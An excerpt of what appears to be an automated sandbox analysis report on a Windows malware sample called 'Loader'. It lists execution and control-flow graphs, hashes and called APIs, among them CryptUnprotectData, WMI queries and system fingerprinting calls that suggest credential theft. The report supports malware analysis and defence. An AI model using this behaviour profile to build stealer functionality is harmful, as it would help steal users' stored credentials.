                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionRaise___std_exception_copy
                                                                                                  • String ID: bad array new length$ios_base::badbit set
                                                                                                  • API String ID: 3109751735-1158432155
                                                                                                  • Opcode ID: fb4a3dcc6ae9f260a011df3fd74b16d871091adf93b3cd61472f9f8c26350b46
                                                                                                  • Instruction ID: 5828b73985da4892474a2de5ce16a56f2e60418cf8dc1164ecf5716b6fe3a1f9
                                                                                                  • Opcode Fuzzy Hash: fb4a3dcc6ae9f260a011df3fd74b16d871091adf93b3cd61472f9f8c26350b46
                                                                                                  • Instruction Fuzzy Hash: 6FF0D4F1614300ABD700AF18DD49B4BBBF4AB48718F018C1DF5999B340D3B5E444CB92

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:4.7%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:29.6%
                                                                                                  Total number of Nodes:203
                                                                                                  Total number of Limit Nodes:14
                                                                                                  execution_graph 34046 43dd42 34048 43dd70 34046->34048 34047 43ddee 34048->34047 34050 43da10 LdrInitializeThunk 34048->34050 34050->34047 34051 43de41 34052 43de60 34051->34052 34055 43da10 LdrInitializeThunk 34052->34055 34054 43e37f 34055->34054 34061 417745 34062 417750 34061->34062 34063 4178d0 CryptUnprotectData 34062->34063 34064 4178fa 34063->34064 34064->34064 34151 436885 34154 4368ac 34151->34154 34152 4368ed 34154->34152 34155 43da10 LdrInitializeThunk 34154->34155 34155->34154 34156 42c98c 34157 42c9b0 34156->34157 34157->34157 34158 42cda4 GetPhysicallyInstalledSystemMemory 34157->34158 34159 42cde0 34158->34159 34159->34159 34065 42d0cd 34067 42d100 34065->34067 34066 42d208 34067->34066 34069 43da10 LdrInitializeThunk 34067->34069 34069->34066 34070 4230d3 34071 4230dd 34070->34071 34071->34071 34077 440dc0 34071->34077 34073 423367 34074 423351 GetLogicalDrives 34076 440dc0 LdrInitializeThunk 34074->34076 34075 4231d1 34075->34073 34075->34074 34075->34075 34076->34073 34079 440de0 34077->34079 34078 440f1e 34078->34075 34079->34078 34081 43da10 LdrInitializeThunk 34079->34081 34081->34078 34160 426090 34161 4260c0 34160->34161 34163 42614e 34161->34163 34170 43da10 LdrInitializeThunk 34161->34170 34162 426270 34163->34162 34165 43bd20 RtlAllocateHeap 34163->34165 34167 4261be 34165->34167 34166 43bd40 RtlFreeHeap 34166->34162 34169 42626e 34167->34169 34171 43da10 LdrInitializeThunk 34167->34171 34169->34166 34169->34169 34170->34163 34171->34169 34172 43d990 34173 43d9b6 34172->34173 34174 43d9d5 34172->34174 34175 43d9ca 34172->34175 34176 43d9a8 34172->34176 34177 43d9d0 34172->34177 34182 43d9e1 34172->34182 34181 43d9bb RtlReAllocateHeap 34173->34181 34179 43bd40 RtlFreeHeap 34174->34179 34178 43bd20 RtlAllocateHeap 34175->34178 34176->34173 34176->34174 34176->34177 34176->34182 34178->34177 34179->34182 34180 43bd40 RtlFreeHeap 34180->34177 34181->34177 34182->34180 34082 40cad6 CoInitializeEx CoInitializeEx 34183 432919 34186 414290 34183->34186 34185 43291e CoSetProxyBlanket 34186->34185 34187 40d11b 34188 40d130 34187->34188 34191 4387d0 34188->34191 34190 40d24a 34190->34190 34193 438800 CoCreateInstance 34191->34193 34194 438a70 SysAllocString 34193->34194 34195 438fbb 34193->34195 34198 438afa 34194->34198 34197 438fcb GetVolumeInformationW 34195->34197 34206 438fe6 34197->34206 34199 438b02 CoSetProxyBlanket 34198->34199 34200 438fa8 SysFreeString 34198->34200 34201 438b22 SysAllocString 34199->34201 34202 438f9e 34199->34202 34200->34195 34204 438c30 34201->34204 34202->34200 34204->34204 34205 438c46 SysAllocString 34204->34205 34208 438c6e 34205->34208 34206->34190 34207 438f89 SysFreeString SysFreeString 34207->34202 34208->34207 34209 438f7f 34208->34209 34210 438cb9 VariantInit 34208->34210 34209->34207 34212 438d10 34210->34212 34211 438f6e VariantClear 34211->34209 34212->34211 34083 420760 34084 42076e 34083->34084 34088 4207c0 34083->34088 34089 420880 34084->34089 34086 42083c 34087 41e990 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 34086->34087 34086->34088 34087->34088 34090 420890 34089->34090 34090->34090 34091 440dc0 LdrInitializeThunk 34090->34091 34092 4209cf 34091->34092 34213 43e9a1 GetForegroundWindow 34217 43fda0 34213->34217 34215 43e9b0 GetForegroundWindow 34216 43e9c2 34215->34216 34218 43fdb0 34217->34218 34218->34215 34219 4336a0 34220 4336ce GetSystemMetrics GetSystemMetrics 34219->34220 34221 433711 34220->34221 34093 40cc67 CoInitializeSecurity 34094 42e1ee CoSetProxyBlanket 34227 41052c 34228 410546 34227->34228 34229 4107ff RtlExpandEnvironmentStrings 34228->34229 34232 40ead5 34228->34232 34230 410876 34229->34230 34231 4108e0 RtlExpandEnvironmentStrings 34230->34231 34230->34232 34231->34232 34234 41095e 34231->34234 34235 414ea0 34234->34235 34236 414ec0 34235->34236 34249 440c30 34236->34249 34238 415083 34239 4150a5 34238->34239 34240 4150e2 34238->34240 34243 415256 34238->34243 34247 4152d2 34238->34247 34259 440f70 LdrInitializeThunk 34238->34259 34239->34240 34239->34243 34239->34247 34253 441030 34239->34253 34240->34232 34243->34240 34260 43da10 LdrInitializeThunk 34243->34260 34246 4154ca 34247->34247 34248 440c30 LdrInitializeThunk 34247->34248 34248->34240 34251 440c50 34249->34251 34250 440d6e 34250->34238 34251->34250 34261 43da10 LdrInitializeThunk 34251->34261 34254 441060 34253->34254 34257 4410ae 34254->34257 34262 43da10 LdrInitializeThunk 34254->34262 34255 4150d3 34255->34240 34255->34243 34255->34247 34257->34255 34263 43da10 LdrInitializeThunk 34257->34263 34259->34239 34260->34246 34261->34250 34262->34257 34263->34255 34264 43dbac 34265 43dbc0 34264->34265 34267 43dc3e 34265->34267 34271 43da10 LdrInitializeThunk 34265->34271 34270 43da10 LdrInitializeThunk 34267->34270 34269 43e21d 34270->34269 34271->34267 34272 42bf32 34273 42bf3e GetComputerNameExA 34272->34273 34275 4085b0 34277 4085bc 34275->34277 34276 4086d9 ExitProcess 34277->34276 34278 4085d1 GetCurrentProcessId GetCurrentThreadId SHGetSpecialFolderPathW 34277->34278 34279 4086c2 34277->34279 34280 408600 34278->34280 34288 43d970 FreeLibrary 34279->34288 34280->34280 34282 43bd20 RtlAllocateHeap 34280->34282 34283 408638 GetForegroundWindow 34282->34283 34285 4086b1 34283->34285 34285->34279 34287 40b550 FreeLibrary FreeLibrary 34285->34287 34287->34279 34288->34276 34095 43bd70 34096 43bd90 34095->34096 34098 43be0e 34096->34098 34105 43da10 LdrInitializeThunk 34096->34105 34097 43c001 34098->34097 34106 43bd20 34098->34106 34102 43be6a 34104 43bf0e 34102->34104 34109 43da10 LdrInitializeThunk 34102->34109 34110 43bd40 34104->34110 34105->34098 34114 43f2f0 34106->34114 34108 43bd2a RtlAllocateHeap 34108->34102 34109->34104 34111 43bd53 34110->34111 34112 43bd55 34110->34112 34111->34097 34113 43bd5a RtlFreeHeap 34112->34113 34113->34097 34115 43f300 34114->34115 34115->34108 34115->34115 34116 43fef0 34117 43ff10 34116->34117 34117->34117 34119 43ff4e 34117->34119 34126 43da10 LdrInitializeThunk 34117->34126 34118 44016d 34119->34118 34121 43bd20 RtlAllocateHeap 34119->34121 34123 43ffc5 34121->34123 34122 43bd40 RtlFreeHeap 34122->34118 34125 44003f 34123->34125 34127 43da10 LdrInitializeThunk 34123->34127 34125->34122 34126->34119 34127->34125 34289 4384b0 34290 4384d5 34289->34290 34293 438576 34290->34293 34298 43da10 LdrInitializeThunk 34290->34298 34292 438761 34293->34292 34295 43865e 34293->34295 34297 43da10 LdrInitializeThunk 34293->34297 34295->34292 34299 43da10 LdrInitializeThunk 34295->34299 34297->34293 34298->34290 34299->34295 34133 440770 34134 440781 34133->34134 34135 4408af 34134->34135 34143 43da10 LdrInitializeThunk 34134->34143 34136 440a86 34135->34136 34138 43bd20 RtlAllocateHeap 34135->34138 34139 440939 34138->34139 34142 4409be 34139->34142 34144 43da10 LdrInitializeThunk 34139->34144 34140 43bd40 RtlFreeHeap 34140->34136 34142->34140 34143->34135 34144->34142 34145 42bdf4 34146 42be04 FreeLibrary 34145->34146 34149 42be2b 34146->34149 34148 42beab GetComputerNameExA 34150 42bf2e 34148->34150 34149->34148 34150->34150 34300 40d4b9 34301 40d510 34300->34301 34303 43da10 LdrInitializeThunk 34301->34303 34303->34301 34304 436a38 34305 436a50 34304->34305 34306 436a65 GetUserDefaultUILanguage 34305->34306 34307 436a85 34306->34307

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 4387d0-4387f5 1 438800-43882f 0->1 1->1 2 438831-438844 1->2 3 438850-438890 2->3 3->3 4 438892-4388d7 3->4 5 4388e0-43890e 4->5 5->5 6 438910-43892f 5->6 8 4389d2-4389df 6->8 9 438935-43893e 6->9 10 4389e0-438a0b 8->10 11 438940-438970 9->11 10->10 12 438a0d-438a6a CoCreateInstance 10->12 11->11 13 438972-438988 11->13 14 438a70-438aa1 12->14 15 438fbb-438fe4 call 43f730 GetVolumeInformationW 12->15 16 438990-4389bc 13->16 17 438ab0-438ace 14->17 22 438fe6-438fea 15->22 23 438fee-438ff0 15->23 16->16 19 4389be-4389cb 16->19 17->17 20 438ad0-438afc SysAllocString 17->20 19->8 28 438b02-438b1c CoSetProxyBlanket 20->28 29 438fa8-438fb7 SysFreeString 20->29 22->23 24 43900d-439014 23->24 26 439020-439036 24->26 27 439016-43901d 24->27 30 439040-439054 26->30 27->26 31 438b22-438b3f 28->31 32 438f9e-438fa4 28->32 29->15 30->30 33 439056-43908f 30->33 34 438b40-438bae 31->34 32->29 35 439090-4390c9 33->35 34->34 36 438bb0-438c26 SysAllocString 34->36 35->35 37 4390cb-4390ff call 41d350 35->37 38 438c30-438c44 36->38 42 439100-439108 37->42 38->38 40 438c46-438c77 SysAllocString 38->40 45 438f89-438f9b SysFreeString * 2 40->45 46 438c7d-438c9f 40->46 42->42 44 43910a-43910c 42->44 47 439112-439122 call 407ff0 44->47 48 439000-439007 44->48 45->32 52 438ca5-438ca8 46->52 53 438f7f-438f85 46->53 47->48 48->24 50 439127-43912e 48->50 52->53 55 438cae-438cb3 52->55 53->45 55->53 56 438cb9-438d01 VariantInit 55->56 57 438d10-438d51 56->57 57->57 58 438d53-438d65 57->58 59 438d69-438d72 58->59 60 438d78-438d7e 59->60 61 438f6e-438f7b VariantClear 59->61 60->61 62 438d84-438d8e 60->62 61->53 63 438d90-438d97 62->63 64 438dcd-438dcf 62->64 66 438dac-438db0 63->66 65 438dd1-438deb call 407f70 64->65 75 438df1-438dfd 65->75 76 438f19-438f2a 65->76 68 438db2-438dbb 66->68 69 438da0 66->69 70 438dc2-438dc6 68->70 71 438dbd-438dc0 68->71 73 438da1-438daa 69->73 70->73 74 438dc8-438dcb 70->74 71->73 73->65 73->66 74->73 75->76 77 438e03-438e0b 75->77 78 438f31-438f44 76->78 79 438f2c 76->79 80 438e10-438e1a 77->80 81 438f46 78->81 82 438f4b-438f6b call 407fa0 call 407f80 78->82 79->78 83 438e30-438e36 80->83 84 438e1c-438e21 80->84 81->82 82->61 88 438e54-438e62 83->88 89 438e38-438e3b 83->89 87 438ec0-438ec6 84->87 91 438ec8-438ece 87->91 93 438e64-438e67 88->93 94 438eda-438ee2 88->94 89->88 92 438e3d-438e52 89->92 91->76 97 438ed0-438ed2 91->97 92->87 93->94 95 438e69-438ebf 93->95 98 438ee4-438ee6 94->98 99 438ee8-438eeb 94->99 95->87 97->80 100 438ed8 97->100 98->91 101 438f15-438f17 99->101 102 438eed-438f13 99->102 100->76 101->87 102->87
                                                                                                  APIs
                                                                                                  • CoCreateInstance.OLE32(0044368C,00000000,00000001,0044367C), ref: 00438A5F
                                                                                                  • SysAllocString.OLEAUT32(AF71AD7E), ref: 00438AD5
                                                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438B14
                                                                                                  • SysAllocString.OLEAUT32(5F8F5D8B), ref: 00438BB5
                                                                                                  • SysAllocString.OLEAUT32(4F0B4D1F), ref: 00438C4B
                                                                                                  • VariantInit.OLEAUT32(F2FDFCE7), ref: 00438CBE
                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00438FAC
                                                                                                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00438FE0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
                                                                                                  • String ID: UvW$$%&'$&e?g$'y){$Rac$xY`[$|}
                                                                                                  • API String ID: 505850577-3935235898
                                                                                                  • Opcode ID: cedc0d122eda84c37e771d2f76dcedd7a404c4fffcf9a77079a05c5f669563b7
                                                                                                  • Instruction ID: 3c98ca3655e8fbad89b897cedc23f9ec929c21c5d575d6668501c9692a1c22de
                                                                                                  • Opcode Fuzzy Hash: cedc0d122eda84c37e771d2f76dcedd7a404c4fffcf9a77079a05c5f669563b7
                                                                                                  • Instruction Fuzzy Hash: 4D32F072A083408BD314CF64C8817ABFBE2EBD9714F18592EF5949B390DB78D905CB96

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 109 41052c-410544 110 410546-410549 109->110 111 410573-4105a1 call 401880 110->111 112 41054b-410571 110->112 115 4105a3-4105a6 111->115 112->110 116 4105d5-4105f8 call 401880 115->116 117 4105a8-4105d3 115->117 120 4105fa-410636 call 413e30 116->120 121 4105fc-410600 116->121 117->115 128 410638 120->128 129 41063a-41067d call 407f70 call 40a510 120->129 123 410fc3 121->123 125 411ba0 123->125 127 411ba2-411ba5 call 401f40 125->127 135 40eae1-411bb6 127->135 136 40eae8-40eb12 call 401f50 127->136 128->129 142 410684-410687 129->142 143 40eb16-40eb19 136->143 144 4106b4-4106cd call 401880 142->144 145 410689-4106b2 142->145 146 40eb55-40eb7b call 401e40 143->146 147 40eb1b-40eb53 143->147 151 4106d3-41073b call 413e30 144->151 152 410777-4107d0 call 413e30 144->152 145->142 156 40eb7d-40eba0 146->156 157 40eb7f 146->157 147->143 162 41073d 151->162 163 41073f-410770 call 407f70 call 40a510 151->163 164 4107d2 152->164 165 4107d4-410872 call 407f70 call 40a510 RtlExpandEnvironmentStrings 152->165 161 40eba2-40eba5 156->161 157->127 166 40eba7-40ebf6 161->166 167 40ebf8-40ec4d call 401980 161->167 162->163 163->152 164->165 179 410876-410879 165->179 166->161 167->125 177 40ec53 167->177 177->125 180 410898-4108a1 179->180 181 41087b-410896 179->181 182 4108a3-4108b6 call 407f80 180->182 183 4108bb-4108d4 180->183 181->179 182->123 185 4108d6 183->185 186 4108d8-410933 call 407f70 RtlExpandEnvironmentStrings 183->186 185->186 191 410935-410959 call 407f80 * 2 186->191 192 41095e-410987 call 407f80 186->192 211 410fc1 191->211 201 410989-41098c 192->201 203 4109ca-4109ea call 401880 201->203 204 41098e-4109c8 201->204 209 4109ec 203->209 210 4109ee-410a0f call 413e30 203->210 204->201 212 410a45-410a64 209->212 216 410a11 210->216 217 410a13-410a43 call 407f70 call 40a510 210->217 211->123 215 410a66-410a69 212->215 218 410ab2-410afd call 401b90 215->218 219 410a6b-410ab0 215->219 216->217 217->212 224 410b01-410b04 218->224 219->215 226 410b06-410b39 224->226 227 410b3b-410b63 call 401a90 224->227 226->224 231 410b69-410ba5 call 414290 call 401f40 227->231 232 410e8c-410f1c call 408890 call 414ea0 call 409400 227->232 242 410ba7 231->242 243 410ba9-410bce call 407f70 231->243 244 410f21-410f26 232->244 242->243 252 410bd0-410bd7 243->252 253 410bfb-410bfd 243->253 246 410f65-410f97 call 407f80 * 2 244->246 247 410f28-410f37 244->247 285 410fa1-410fab 246->285 286 410f99-410f9c call 407f80 246->286 250 410f59-410f61 call 407f80 247->250 251 410f39-410f40 247->251 250->246 258 410f42-410f55 call 4140e0 251->258 260 410bd9-410bf1 call 413f60 252->260 257 410bff-410c01 253->257 262 410c03-410c0a 257->262 263 410c0f-410c4a call 401f50 257->263 272 410f57 258->272 273 410bf3 260->273 274 410bf5-410bf9 260->274 262->232 276 410c4c-410c4f 263->276 272->250 273->260 274->253 278 410c51-410c81 276->278 279 410c83-410cc3 call 401880 276->279 278->276 284 410cc5-410cc8 279->284 287 410ce7-410d2f call 401880 284->287 288 410cca-410ce5 284->288 290 410fb5-410fbc call 408970 285->290 291 410fad-410fb0 call 407f80 285->291 286->285 296 410d31-410d34 287->296 288->284 290->211 291->290 297 410d82-410dd4 call 401b90 296->297 298 410d36-410d80 296->298 301 410dd6-410dd9 297->301 298->296 302 410e16-410e87 call 401b90 call 413f80 301->302 303 410ddb-410e14 301->303 302->257 303->301
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 1$<$A$G$U$[$b$f$p$x${
                                                                                                  • API String ID: 0-2596809943
                                                                                                  • Opcode ID: 06a85181474689744a2e3f55f7eab027660ec147f8b5799b2c8a475eacb6260e
                                                                                                  • Instruction ID: 977eae197484217fe3de983ef0328e02866eaecbdb9648841de3f436da40142b
                                                                                                  • Opcode Fuzzy Hash: 06a85181474689744a2e3f55f7eab027660ec147f8b5799b2c8a475eacb6260e
                                                                                                  • Instruction Fuzzy Hash: 3052907160C7808BD324DB38C5953AFBBE1ABD5314F148A2EE4DAD73C1DA7889858B47

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 313 4230d3-4230d6 314 4230e5-4230ee 313->314 315 4230dd 313->315 316 4230f0-4230f5 314->316 317 4230f7 314->317 315->314 318 4230fe-423139 call 407f70 316->318 317->318 321 423140-42316f 318->321 321->321 322 423171-423179 321->322 323 423191-42319d 322->323 324 42317b-42317e 322->324 326 4231c1-4231dd call 440dc0 323->326 327 42319f-4231a3 323->327 325 423180-42318f 324->325 325->323 325->325 331 4233a3 326->331 332 4234c0-423562 326->332 333 4231f4-4231fd 326->333 334 4231e4-4231eb 326->334 335 4233a9-42344b 326->335 328 4231b0-4231bf 327->328 328->326 328->328 331->335 339 423570-4235ad 332->339 336 423206 333->336 337 4231ff-423204 333->337 334->333 338 423450-42348c 335->338 340 42320d-4232b1 call 407f70 336->340 337->340 338->338 341 42348e-4234b1 call 420e10 338->341 339->339 342 4235af-4235c3 call 420e10 339->342 349 4232c0-4232ee 340->349 341->332 348 4235c8-4235cb 342->348 351 4235d3-4235eb 348->351 349->349 350 4232f0-4232f8 349->350 353 423321-423334 350->353 354 4232fa-423301 350->354 352 4235f0-423620 351->352 352->352 355 423622-4236aa 352->355 357 423351-423371 GetLogicalDrives call 440dc0 353->357 358 423336-42333a 353->358 356 423310-42331f 354->356 359 4236b0-4236d1 355->359 356->353 356->356 357->351 365 423720-423726 call 407f80 357->365 366 423711 357->366 367 423717-42371d call 407f80 357->367 368 423735-42373b call 407f80 357->368 369 42370b 357->369 370 423378-423392 357->370 371 423399 357->371 372 42373e-42374a 357->372 373 42372f 357->373 374 4236fc-423702 call 407f80 357->374 360 423340-42334f 358->360 359->359 362 4236d3-4236f2 call 420a30 359->362 360->357 360->360 362->374 365->373 366->367 367->365 368->372 369->366 370->351 370->365 370->366 370->367 370->368 370->369 370->371 370->372 370->373 370->374 371->331 373->368 374->369
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: DJ$,@ F$,D J$57B$>\:B$IF$HN
                                                                                                  • API String ID: 0-546559132
                                                                                                  • Opcode ID: 256cd1e2b87f342527cd7979723287081b232435937e080061f0061264ea3875
                                                                                                  • Instruction ID: 573b38de4df0c584551da9470d46ba7f63cc1349f9138d30f378e2aa21cb097c
                                                                                                  • Opcode Fuzzy Hash: 256cd1e2b87f342527cd7979723287081b232435937e080061f0061264ea3875
                                                                                                  • Instruction Fuzzy Hash: 88E1D9B560D3418FD310CF68E89126BBBE1FBC5754F14892DE9818B361E778890ACB4B

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 391 409400-40940e 392 409853 391->392 393 409414-40947b call 405e20 call 407f70 391->393 395 409855-409861 392->395 399 409480-4094bc 393->399 399->399 400 4094be-4094de call 408d30 399->400 403 4094e0-40950d 400->403 403->403 404 40950f-409536 call 408d30 403->404 407 409540-409581 404->407 407->407 408 409583-4095b3 call 408d30 407->408 411 4095c0-4095d4 408->411 411->411 412 4095d6-4095e3 411->412 413 4095f0-40961c 412->413 413->413 414 40961e-40963b call 408d30 413->414 417 409640-409688 414->417 417->417 418 40968a-409758 call 409000 417->418 421 409760-409774 418->421 421->421 422 409776-40977e 421->422 423 409780-409788 422->423 424 4097a1-4097ac 422->424 427 409790-40979f 423->427 425 4097d1-4097ff 424->425 426 4097ae-4097b1 424->426 429 409800-409814 425->429 428 4097c0-4097cf 426->428 427->424 427->427 428->425 428->428 429->429 430 409816-40982b call 40bf90 429->430 432 409830-409851 call 407f80 430->432 432->395
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 9Z$FAD730AECC011CA38246926E533C64D7$QB$f*Dk$hi$j*Dk
                                                                                                  • API String ID: 0-643466669
                                                                                                  • Opcode ID: b730e9b78eb2bf3f614c61d1bfed981cc9b54103566f3d92fdc9fb82601dc528
                                                                                                  • Instruction ID: f303c378167b457a4bc42ceebe78ce79b7bb772c8b3d846b3dc4aa0fafa8ed13
                                                                                                  • Opcode Fuzzy Hash: b730e9b78eb2bf3f614c61d1bfed981cc9b54103566f3d92fdc9fb82601dc528
                                                                                                  • Instruction Fuzzy Hash: 85B1227161C3808BD718DF65C8516ABBBE2EBD2304F14892DE0E59B392D73CD50ACB5A

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 435 42c98c-42c9aa 436 42c9b0-42c9ea 435->436 436->436 437 42c9ec-42c9f9 436->437 438 42ca1b-42ca27 437->438 439 42c9fb-42ca01 437->439 441 42ca41-42ca8b call 43f730 438->441 442 42ca29-42ca2b 438->442 440 42ca10-42ca19 439->440 440->438 440->440 448 42ca90-42cad1 441->448 443 42ca30-42ca3d 442->443 443->443 445 42ca3f 443->445 445->441 448->448 449 42cad3-42cb12 call 41d350 448->449 452 42cb20-42cb4c 449->452 452->452 453 42cb4e-42cb55 452->453 454 42cb57-42cb5b 453->454 455 42cb6b-42cb73 453->455 458 42cb60-42cb69 454->458 456 42cb75-42cb76 455->456 457 42cb8b-42cb95 455->457 459 42cb80-42cb89 456->459 460 42cb97-42cb9b 457->460 461 42cbab-42cbeb 457->461 458->455 458->458 459->457 459->459 462 42cba0-42cba9 460->462 463 42cbf0-42cc04 461->463 462->461 462->462 463->463 464 42cc06-42cc0d 463->464 465 42cc2b-42cc35 464->465 466 42cc0f-42cc13 464->466 468 42cc37-42cc3b 465->468 469 42cc4b-42ccf2 465->469 467 42cc20-42cc29 466->467 467->465 467->467 470 42cc40-42cc49 468->470 471 42cd00-42cd3a 469->471 470->469 470->470 471->471 472 42cd3c-42cd49 471->472 473 42cd5b-42cd67 472->473 474 42cd4b-42cd4f 472->474 476 42cd81-42cdd3 call 43f730 GetPhysicallyInstalledSystemMemory 473->476 477 42cd69-42cd6b 473->477 475 42cd50-42cd59 474->475 475->473 475->475 482 42cde0-42ce22 476->482 478 42cd70-42cd7d 477->478 478->478 480 42cd7f 478->480 480->476 482->482 483 42ce24-42ce5b call 41d350 482->483 486 42ce60-42ce8c 483->486 486->486 487 42ce8e-42ce95 486->487 488 42ce97-42ce9b 487->488 489 42ceab-42ceb3 487->489 490 42cea0-42cea9 488->490 491 42ceb5-42ceb6 489->491 492 42cecb-42ced5 489->492 490->489 490->490 493 42cec0-42cec9 491->493 494 42ced7-42cedb 492->494 495 42ceeb-42cf2b 492->495 493->492 493->493 496 42cee0-42cee9 494->496 497 42cf30-42cf44 495->497 496->495 496->496 497->497 498 42cf46-42cf55 497->498 499 42cf57 498->499 500 42cf6b-42cf75 498->500 501 42cf60-42cf69 499->501 502 42cf77 500->502 503 42cf8b-42d015 500->503 501->500 501->501 504 42cf80-42cf89 502->504 504->503 504->504
                                                                                                  APIs
                                                                                                  • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042CDAC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InstalledMemoryPhysicallySystem
                                                                                                  • String ID: @[/S$YcZ`$b
                                                                                                  • API String ID: 3960555810-168354034
                                                                                                  • Opcode ID: 3b8701f6d285188c90c39da254eef539b97e416a32c7c175b415e0f0a5f096d4
                                                                                                  • Instruction ID: b2947f96fe340a9df3130b14c84d258fde6853037fb12cce7bd63350d2db69b3
                                                                                                  • Opcode Fuzzy Hash: 3b8701f6d285188c90c39da254eef539b97e416a32c7c175b415e0f0a5f096d4
                                                                                                  • Instruction Fuzzy Hash: 39F1247060C3D18BD729CF29A4A036FFFE1AF96304F18496EE0DA87392D77985058B56
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6cc985996d123b44c06bdbe62607eeac046dd191f9733dc24fca1af59f0d703a
                                                                                                  • Instruction ID: b8f4197d2f7c9f56fe9597a4586bb863907c9934a7ce81ce2e300af997d9591d
                                                                                                  • Opcode Fuzzy Hash: 6cc985996d123b44c06bdbe62607eeac046dd191f9733dc24fca1af59f0d703a
                                                                                                  • Instruction Fuzzy Hash: 398117B190C2018FC714DF28C8916ABB7F1AF95304F18492EE4D987392E738E945CB9B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: TUVW
                                                                                                  • API String ID: 2994545307-380802359
                                                                                                  • Opcode ID: 5a35a9d452afbc38b6c475497b936c0f9f51ddbb7844b1b6c0d36c5b06337292
                                                                                                  • Instruction ID: 7047d3b5c699d964b661b5aab337125677ab7b56ce49f2f3292149c0b4397d23
                                                                                                  • Opcode Fuzzy Hash: 5a35a9d452afbc38b6c475497b936c0f9f51ddbb7844b1b6c0d36c5b06337292
                                                                                                  • Instruction Fuzzy Hash: 659165717083019FE325DF68D880A2BB7E2EBD6310F18893DE69597391C639DC16CB96
                                                                                                  APIs
                                                                                                  • LdrInitializeThunk.NTDLL(00440D9D,?,00000018,?,?,00000018,?,?,?), ref: 0043DA3E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
